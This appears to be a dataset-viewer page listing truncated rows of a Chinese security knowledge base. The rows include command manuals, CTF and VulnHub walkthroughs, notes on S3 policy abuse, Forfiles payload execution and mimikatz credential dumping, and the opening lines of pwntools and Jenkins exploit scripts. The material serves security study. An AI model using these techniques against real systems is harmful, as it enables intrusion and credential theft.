相应的,我们在协议分析这一章节中,将会从以下几个方面来介绍这一部分的知识:
- `Wireshark` 常用功能的介绍
- `HTTP` 协议分析
- `HTTPS` 协... | sec-knowleage |
### Thread Local Storage(TLS)概述
线程本地存储(TLS)用于在线程启动前对特定线程数据进行初始化, 因为每个进程都包含至少1个线程, 在主线程运行前初始化数据. 初始化操作可以通过指定一个已经复制到动态分配内存中去的静态缓冲区, 和/或通过在回调函数数组中执行代码, 来初始化动态内存内容. 经常是由于滥用回调函数数组而造成问题.
在运行时, TLS回调函数数组内容可以被修改或增加, 新加入或新修改的回调函数会使用新地址进行调用. 回调函数的数目也没有限制. 数组的扩展操作可以用以下代码完成:
``` asm
l1: mov d [offset cbEnd], offset l2
ret
l2: ... | sec-knowleage |
bzdiff
===
直接比较两个.bz2压缩包中文件的不同
## 补充说明
**bzdiff命令** 用于直接比较两个“.bz2”压缩包中文件的不同,省去了解压缩后再调用diff命令的过程。
### 语法
```shell
bzdiff(参数)
```
### 参数
* 文件1:指定要比较的第一个.bz2压缩包;
* 文件2:指定要比较的第二个.bz2压缩包。 | sec-knowleage |
# zip (300, coding)
> We found a strange zip file. Sadly the content is encrypted. As only criminals encrypt their stuff we need to decrypt this urgently.
> Flag format is FLAGB**************S.
In this task we got a zip file containing a couple of other small zip files. All of them were encrypted, but their size
was on... | sec-knowleage |
# digitalworld.local: snakeoil
> https://download.vulnhub.com/digitalworld/SNAKEOIL.7z
靶场IP:`192.168.32.204`
扫描对外端口服务
```
┌──(root💀kali)-[/tmp]
└─# nmap -p 1-65535 -sV 192.168.32.204
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-06 00:04 EDT
Nmap scan report for 192.168.32.204
Host is up (0.00090s latency).
Not ... | sec-knowleage |
# Kioptrix Level 1.2
下载地址:
```
https://download.vulnhub.com/kioptrix/KVM3.rar
```
## 实战操作
扫描端口
```
┌──(root💀kali)-[~/Desktop]
└─# nmap -sV -p1-65535 192.168.32.137 ... | sec-knowleage |
dris
===
显示和清空目录堆栈中的内容
## 补充说明
**dris命令** 用于显示和清空目录堆栈中的内容。
### 语法
```shell
dris(选项)
```
### 选项
```shell
+n:显示从左边算起第n笔的目录;
-n:显示从右边算起第n笔的目录;
-l:显示目录完整的记录。
``` | sec-knowleage |
---
title: Bucket 策略可写
---
<center><h1>Bucket 策略可写</h1></center>
---
## 修改策略获得敏感文件
现有以下 Bucket 策略
</br>
<img width="800" src="/img/1650007548.png"></br>
可以看到根据当前配置,我们可以对 Bucket 策略进行读写,但如果想读取 s3://teamssix/flag 是被禁止的
<img width="1000" src="/img/1650007587.png"></br>
因为当前策略允许我们写入 Bucket 策略,因此可以将策略里原来的 Deny 改为 Allow,这样就能访... | sec-knowleage |
#!/usr/bin/python2
from cStringIO import StringIO
from pwn import *
def attack(connection):
stage2_code = [
"begin:",
" mov ebp, 0x08049000",
shellcraft.i386.linux.syscall("SYS_alarm", 0),
"open:",
" lea ebx, [ebp + suffix - begin - 1]",
" ... | sec-knowleage |
unalias
===
删除由alias设置的别名
## 概要
```shell
unalias [-a] name [name ...]
```
## 主要用途
- 删除一个或多个别名。
- 删除全部已定义的别名。
## 选项
```shell
-a:删除全部已定义的别名。
```
## 参数
name:指定要删除的一个或多个已定义的别名。
### 返回值
unalias返回true除非您要删除的别名未定义。
## 例子
```shell
# 删除全部已定义的别名
unalias -a
# 删除已定义的别名(假设当前环境存在以下别名)
unalias vi
unalias ls grep
```
## 错误用法
- 要删除的别名未... | sec-knowleage |
# 53. 数字在排序数组中出现的次数
## 题目链接
[牛客网](https://www.nowcoder.com/practice/70610bf967994b22bb1c26f9ae901fa2?tpId=13&tqId=11190&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
```html
Input:
nums = 1, 2, 3, 3, 3, 3, 4, 6
K = 3
Output:
4
```
## 解题思路
只要能找出给定的数字 k 在有序数组第一个... | sec-knowleage |
.\"
.\" MAN PAGE COMMENTS to
.\"
.\" Chet Ramey
.\" Information Network Services
.\" Case Western Reserve University
.\" chet@ins.CWRU.Edu
.\"
.\" Last Change: Mon Jul 15 15:20:56 EDT 2002
.\"
.\" bash_builtins, strip all but Built-Ins section
.if \n(zZ=1 .ig zZ
.if \n(zY=1 .ig zY
.TH BASH 1 "2002 July 15" "GNU Bash-2.... | sec-knowleage |
# b00tl3gRSA2
Cryptography, 400 points
## Description:
> In RSA d is alot bigger than e, why dont we use d to encrypt instead of e?
## Solution:
This challenge is similar to last year's [Super Safe RSA 2](/2018_picoCTF/Super%20Safe%20RSA%202.md).
Let's connect to the attached service:
```console
root@kali:/media/sf_CT... | sec-knowleage |
# 程序加载
程序加载过程其实就是系统创建或者扩充进程镜像的过程。它只是按照一定的规则把文件的段拷贝到虚拟内存段中。进程只有在执行的过程中使用了对应的逻辑页面时,才会申请相应的物理页面。通常来说,一个进程中有很多页是没有被引用的。因此,延迟物理读写可以提高系统的性能。为了达到这样的效率,可执行文件以及共享目标文件所拥有的段的文件偏移以及虚拟地址必须是合适的,也就是说他们必须是页大小的整数倍。
在 Intel 架构中,虚拟地址以及文件偏移必须是 4KB(或者更大的数且为 2 的整数幂次)的整数倍。
下面是一个可执行文件加载到内存中布局的例子
对应的代码段以及数据段的解释如下
在这个例子中,尽管代码段和数据段在模4KB的意义下相等,但是... | sec-knowleage |
.\" Copyright (c) 1990, 1993
.\" The Regents of the University of California. All rights reserved.
.\"
.\" Redistribution and use in source and binary forms, with or without
.\" modification, are permitted provided that the following conditions
.\" are met:
.\" 1. Redistributions of source code must retain the above c... | sec-knowleage |
version: '2'
services:
web:
image: vulhub/appweb:7.0.1
volumes:
- ./appweb.conf:/etc/appweb/appweb.conf
ports:
- "8080:8080" | sec-knowleage |
# 释放内存块
## __libc_free
类似于 malloc,free 函数也有一层封装,命名格式与 malloc 基本类似。代码如下
```c++
void __libc_free(void *mem) {
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
// 判断是否有钩子函数 __free_hook
void (*hook)(void *, const void *) = atomic_forced_read(__free_hook);
if (__builtin_expect(hook != NULL... | sec-knowleage |
#!/usr/bin/python
# coding: UTF-8
# author: Orange Tsai(@orange_8361)
#
import sys
import requests
from enum import Enum
# remove bad SSL warnings
try:
requests.packages.urllib3.disable_warnings()
except:
pass
endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScri... | sec-knowleage |
import hashlib
import binascii
import unittest
from Crypto.Random import random
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798, 0x483ADA7726A3C4655DA4F... | sec-knowleage |
# No Identity For You
* Category: SCADA
* 200 Points
* Solved by the JCTF Team
## Description
> I don't want hackers to steal my identity so I added a firewall for my PLC!
>
> can you bypass it?
> Host: scada-enip-fw.chal.intentsummit.org
>
> Port: 44818
## Solution
SCADA stands for *Supervisory control and data acq... | sec-knowleage |
# T1202-win-间接命令执行-基于Forfiles执行payload(白名单)
## 来自ATT&CK的描述
可以使用各种Windows实用程序来执行命令,而不需要调用cmd。例如,Forfiles、程序兼容性助手(pcalua.exe)、WSL(WindowsSubsystem for Linux)组件以及其他实用程序可以从命令行界面、运行窗口或通过脚本来调用程序和命令的执行。
攻击者可能会滥用这些功能来规避防御,尤其是在破坏检测和/或缓解控制(如组策略)的同时执行任意动作。(这些控制限制/阻止了cmd或恶意负载相关文件扩展名的使用。)
## 测试案例
Forfiles为Windows默认安装的文件操作搜索工具之一,可根据... | sec-knowleage |
# T1003-005-win-DCC2-mimikatz凭证获取
## 来自ATT&CK的描述
攻击者可能试图访问缓存的域凭据,该凭据用于在域控制器不可用的情况下进行身份验证。
在Windows Vista及更高版本上,哈希格式为DCC2(域缓存凭据版本2)哈希,也称为MS-Cache v2哈希。默认缓存凭据的数量各不相同,并且每个系统都可以更改。该散列不允许通过散列样式的攻击,而是需要使用密码破解来恢复纯文本密码。
通过SYSTEM访问,可以使用诸如Mimikatz,Reg和secretsdump.py之类的工具/实用程序来提取缓存的凭据。
注意:Windows Vista的缓存凭据是使用PBKDF2派生的
### DCC2(D... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1997 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: uplevel.n,v 1.2 2003/11/24 05:10:0... | sec-knowleage |
# Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞[CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773)进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了c... | sec-knowleage |
.\" Copyright (c) 1986 The Regents of the University of California.
.\" All rights reserved.
.\"
.\" Redistribution and use in source and binary forms are permitted
.\" provided that the above copyright notice and this paragraph are
.\" duplicated in all such forms and that any documentation,
.\" advertising materials,... | sec-knowleage |
'\"
'\" Copyright (c) 1994 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: subst.n,v 1.2 2003/11/24 05:10:00 ... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.